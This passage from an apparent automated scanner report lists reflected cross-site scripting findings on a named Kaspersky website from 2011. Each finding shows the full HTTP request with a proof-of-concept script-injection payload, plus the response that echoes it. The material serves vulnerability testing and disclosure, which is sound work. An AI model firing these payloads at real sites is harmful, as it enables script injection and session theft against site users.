The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d3d5"><script>alert(1)</script>0c315f9bb81 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services/home-computer-security/internet-security?6d3d5"><script>alert(1)</script>0c315f9bb81=1 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; NO_CACHE=Y; s_cc=true; intcamp=INT1673886; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.3.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); slider_session=yes; gpv_pageName=Search%20%7C%20Search%20Results; ev5=xss; s_nr=1315139065855-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253DSearch%2526oidt%253D3%2526ot%253DSUBMIT; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:00:12 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141212"
Content-Type: text/html; charset=utf-8
Content-Length: 109114
Date: Sun, 04 Sep 2011 13:01:12 GMT
X-Varnish: 1163111776
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services/home-computer-security/internet-security?6d3d5"><script>alert(1)</script>0c315f9bb81=1" />
...[SNIP]...

1.116. http://usa.kaspersky.com/products-services/home-computer-security/mobile-security [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/mobile-security

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee59a"-alert(1)-"e444da54003 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /products-servicesee59a"-alert(1)-"e444da54003/home-computer-security/mobile-security HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; slider_session=yes; ev5=xss; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; s_cc=true; gpv_pageName=Store%20%7C%20Home%20Users%20%7C%20Kaspersky%20Store; s_nr=1315139071025-New; s_sq=%5B%5BB%5D%5D; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.4.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:06:49 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141609"
Content-Type: text/html; charset=utf-8
Content-Length: 39738
Date: Sun, 04 Sep 2011 13:06:56 GMT
X-Varnish: 1163123095
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
rop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/products-servicesee59a"-alert(1)-"e444da54003/home-computer-security/mobile-security";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.117. http://usa.kaspersky.com/products-services/home-computer-security/mobile-security [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/mobile-security

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7232c"><script>alert(1)</script>8b2c2136941 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services7232c"><script>alert(1)</script>8b2c2136941/home-computer-security/mobile-security HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; slider_session=yes; ev5=xss; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; s_cc=true; gpv_pageName=Store%20%7C%20Home%20Users%20%7C%20Kaspersky%20Store; s_nr=1315139071025-New; s_sq=%5B%5BB%5D%5D; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.4.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:05:53 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141553"
Content-Type: text/html; charset=utf-8
Content-Length: 38683
Date: Sun, 04 Sep 2011 13:06:03 GMT
X-Varnish: 1163121250
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services7232c"><script>alert(1)</script>8b2c2136941/home-computer-security/mobile-security" />
...[SNIP]...

1.118. http://usa.kaspersky.com/products-services/home-computer-security/mobile-security [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/mobile-security

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1cd88"-alert(1)-"318679f3559 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /products-services/home-computer-security1cd88"-alert(1)-"318679f3559/mobile-security HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; slider_session=yes; ev5=xss; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; s_cc=true; gpv_pageName=Store%20%7C%20Home%20Users%20%7C%20Kaspersky%20Store; s_nr=1315139071025-New; s_sq=%5B%5BB%5D%5D; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.4.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:09:14 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141754"
Content-Type: text/html; charset=utf-8
Content-Length: 39610
Date: Sun, 04 Sep 2011 13:09:30 GMT
X-Varnish: 1163127529
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/products-services/home-computer-security1cd88"-alert(1)-"318679f3559/mobile-security";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.119. http://usa.kaspersky.com/products-services/home-computer-security/mobile-security [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/mobile-security

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6afa"><script>alert(1)</script>dc1a0daf0d4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services/home-computer-securityd6afa"><script>alert(1)</script>dc1a0daf0d4/mobile-security HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; slider_session=yes; ev5=xss; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; s_cc=true; gpv_pageName=Store%20%7C%20Home%20Users%20%7C%20Kaspersky%20Store; s_nr=1315139071025-New; s_sq=%5B%5BB%5D%5D; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.4.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:08:33 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141713"
Content-Type: text/html; charset=utf-8
Content-Length: 38734
Date: Sun, 04 Sep 2011 13:08:43 GMT
X-Varnish: 1163126100
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services/home-computer-securityd6afa"><script>alert(1)</script>dc1a0daf0d4/mobile-security" />
...[SNIP]...

1.120. http://usa.kaspersky.com/products-services/home-computer-security/mobile-security [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/mobile-security

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5c305"-alert(1)-"ab57f4ebc3c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /products-services/home-computer-security/mobile-security5c305"-alert(1)-"ab57f4ebc3c HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; slider_session=yes; ev5=xss; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; s_cc=true; gpv_pageName=Store%20%7C%20Home%20Users%20%7C%20Kaspersky%20Store; s_nr=1315139071025-New; s_sq=%5B%5BB%5D%5D; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.4.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:11:23 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141883"
Content-Type: text/html; charset=utf-8
Content-Length: 39674
Date: Sun, 04 Sep 2011 13:11:29 GMT
X-Varnish: 1163130713
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
rop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/products-services/home-computer-security/mobile-security5c305"-alert(1)-"ab57f4ebc3c";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.121. http://usa.kaspersky.com/products-services/home-computer-security/mobile-security [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/mobile-security

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48453"><script>alert(1)</script>f916dd51d3f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services/home-computer-security/mobile-security48453"><script>alert(1)</script>f916dd51d3f HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; slider_session=yes; ev5=xss; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; s_cc=true; gpv_pageName=Store%20%7C%20Home%20Users%20%7C%20Kaspersky%20Store; s_nr=1315139071025-New; s_sq=%5B%5BB%5D%5D; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.4.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:11:02 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141862"
Content-Type: text/html; charset=utf-8
Content-Length: 38798
Date: Sun, 04 Sep 2011 13:11:12 GMT
X-Varnish: 1163130234
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services/home-computer-security/mobile-security48453"><script>alert(1)</script>f916dd51d3f" />
...[SNIP]...

1.122. http://usa.kaspersky.com/products-services/home-computer-security/mobile-security [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/mobile-security

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c748"><script>alert(1)</script>97e9ae62b7c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services/home-computer-security/mobile-security?8c748"><script>alert(1)</script>97e9ae62b7c=1 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; slider_session=yes; ev5=xss; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; s_cc=true; gpv_pageName=Store%20%7C%20Home%20Users%20%7C%20Kaspersky%20Store; s_nr=1315139071025-New; s_sq=%5B%5BB%5D%5D; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.4.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:01:58 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141318"
Content-Type: text/html; charset=utf-8
Content-Length: 77948
Date: Sun, 04 Sep 2011 13:02:13 GMT
X-Varnish: 1163114601
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services/home-computer-security/mobile-security?8c748"><script>alert(1)</script>97e9ae62b7c=1" />
...[SNIP]...

1.123. http://usa.kaspersky.com/products-services/home-computer-security/pure [ICID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/pure

Issue detail

The value of the ICID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45594"><script>alert(1)</script>43356559f66 was submitted in the ICID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services/home-computer-security/pure?ICID=INT167388645594"><script>alert(1)</script>43356559f66 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes; gpv_pageName=Homepage; s_nr=1315139037033-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fsites%25252Fusa.kaspersky.com%25252Ffiles%25252Fcustom_search%25252Fsearch-grey.gif%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 12:34:45 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315139685"
Content-Type: text/html; charset=utf-8
Content-Length: 107152
Date: Sun, 04 Sep 2011 12:35:00 GMT
X-Varnish: 1163070127
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services/home-computer-security/pure?ICID=INT167388645594"><script>alert(1)</script>43356559f66" />
...[SNIP]...

1.124. http://usa.kaspersky.com/products-services/home-computer-security/pure [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/pure

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fb7f5"-alert(1)-"314b0280887 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /products-servicesfb7f5"-alert(1)-"314b0280887/home-computer-security/pure?ICID=INT1673886 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes; gpv_pageName=Homepage; s_nr=1315139037033-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fsites%25252Fusa.kaspersky.com%25252Ffiles%25252Fcustom_search%25252Fsearch-grey.gif%2526ot%253DIMAGE

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 12:57:11 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141031"
Content-Type: text/html; charset=utf-8
Content-Length: 40441
Date: Sun, 04 Sep 2011 12:57:54 GMT
X-Varnish: 1163106133
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
rop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/products-servicesfb7f5"-alert(1)-"314b0280887/home-computer-security/pure?ICID=INT1673886";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.125. http://usa.kaspersky.com/products-services/home-computer-security/pure [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/pure

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a252"><script>alert(1)</script>7809b8460a4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services3a252"><script>alert(1)</script>7809b8460a4/home-computer-security/pure?ICID=INT1673886 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes; gpv_pageName=Homepage; s_nr=1315139037033-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fsites%25252Fusa.kaspersky.com%25252Ffiles%25252Fcustom_search%25252Fsearch-grey.gif%2526ot%253DIMAGE

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 12:55:48 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315140948"
Content-Type: text/html; charset=utf-8
Content-Length: 39320
Date: Sun, 04 Sep 2011 12:56:08 GMT
X-Varnish: 1163103380
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services3a252"><script>alert(1)</script>7809b8460a4/home-computer-security/pure?ICID=INT1673886" />
...[SNIP]...

1.126. http://usa.kaspersky.com/products-services/home-computer-security/pure [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/pure

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a91a9"-alert(1)-"929e765b02d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

